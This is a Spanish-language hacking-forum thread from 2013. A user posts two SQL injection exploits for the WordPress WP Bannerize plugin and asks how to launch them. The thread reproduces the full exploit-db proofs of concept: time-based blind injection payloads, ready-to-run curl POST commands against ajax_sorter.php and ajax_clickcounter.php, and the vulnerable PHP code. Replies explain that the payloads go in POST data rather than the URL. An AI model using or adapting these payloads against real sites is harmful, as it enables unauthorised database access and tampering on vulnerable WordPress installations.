Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: TapIt en 23 Enero 2013, 20:11 pm


Título: Dos exploits para WordPress Bannerize Plugin
Publicado por: TapIt en 23 Enero 2013, 20:11 pm
Hola a todos,

Tengo un par de exploits a nivel web que no se como se tiran. Son de tipo SQL injection pero creo que no se pueden utilizar en la URL, ¿donde debería utilizarlos?. Os dejo los links de exploit-db y el fuente. Gracias por la ayuda ;)

http://www.exploit-db.com/exploits/17906/

Código:

# Exploit Title: WordPress WP Bannerize plugin <= 2.8.7 SQL Injection Vulnerability
# Date: 2011-09-22
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-bannerize.zip
# Version: 2.8.7 (tested)
 
---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php
 limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
 
e.g.
curl --data "limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php
 
---------------
Vulnerable code
---------------
if ( @isset($_SERVER['HTTP_X_REQUESTED_WITH']) ) {
    ...
    $limit = intval($_POST['limit']);
    $page_offset = (intval($_POST['offset']) - 1) * $limit;
 
    foreach($_POST["item"] as $key => $value){
        $sql = sprintf("UPDATE `%s` SET `sorter` = %s WHERE id = %s", $wpdb->prefix ."bannerize_b", (intval($key)+$page_offset ), $value );
        $result = mysql_query($sql);
    }
}


http://www.exploit-db.com/exploits/17764/

Código:
# Exploit Title: WordPress WP Bannerize plugin <= 2.8.6 SQL Injection Vulnerability
# Date: 2011-08-31
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-bannerize.zip
# Version: 2.8.6 (tested)
 
---
PoC
---
curl --data "id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)-- " -H "X-Requested-With:XMLHttpRequest" http://www.site.com/wp-content/plugins/wp-bannerize/ajax_clickcounter.php
 
---------------
Vulnerable code
---------------
if ( @isset($_SERVER['HTTP_X_REQUESTED_WITH']) ) {
    ...
    $sql = "UPDATE `" . $wpdb->prefix ."bannerize_b` SET `clickcount` = `clickcount`+1 WHERE id = " . $_POST['id'];
    $result = mysql_query($sql);



Título: Re: Dos exploits para WordPress Bannerize Plugin
Publicado por: TapIt en 23 Enero 2013, 20:15 pm
Solucionado. Dejo el Post por si acaso a alguien le viene bien!

http://www.linuxhispano.net/2009/11/26/navega-por-internet-conquista-la-web-con-curl-parte-1/

Título: Re: Dos exploits para WordPress Bannerize Plugin
Publicado por: it3r en 23 Enero 2013, 21:15 pm
solo para aclarar un poco mas, cuando inyectas por url estas ocupando el metodo http GET y cuando los datos no viajan por la url, se ocupa el método POST.

Saludos.


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines